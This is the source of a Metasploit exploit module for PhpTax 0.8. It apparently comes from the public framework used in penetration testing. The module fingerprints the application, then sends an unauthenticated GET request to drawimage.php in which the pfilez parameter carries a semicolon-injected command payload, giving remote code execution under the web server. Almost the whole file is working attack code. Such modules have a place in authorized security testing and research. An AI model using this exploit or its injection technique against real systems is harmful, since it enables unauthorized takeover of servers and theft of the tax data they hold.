metasploit-framework/modules/exploits/multi/http/phptax_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "PhpTax pfilez Parameter Exec Remote Code Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in PhpTax, an income tax report
        generator.  When generating a PDF, the icondrawpng() function in drawimage.php
        does not properly handle the pfilez parameter, which will be used in an exec()
        statement, and then results in arbitrary remote code execution under the context
        of the web server.  Please note: authentication is not required to exploit this
        vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jean Pascal Pereira <pereira[at]secbiz.de>',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '86992'],
          ['EDB', '21665']
        ],
      'Payload'        =>
        {
          'Compat' =>
          {
            'ConnectionType' => 'find',
            'PayloadType'    => 'cmd',
            'RequiredCmd'    => 'generic perl ruby telnet python'
          }
        },
      'Platform'       => %w{ linux unix },
      'Targets'        =>
        [
          ['PhpTax 0.8', {}]
        ],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'DisclosureDate' => "Oct 8 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
      ])
  end


  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    res = send_request_raw({'uri'=>uri})
    if res and res.body =~ /PHPTAX by William L\. Berggren/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end


  def exploit
    uri = target_uri.path

    print_status("#{rhost}#{rport} - Sending request...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(uri, "drawimage.php"),
      'vars_get' => {
        'pdf'    => 'make',
        'pfilez' => "xxx; #{payload.encoded}"
      }
    })

    handler
  end
end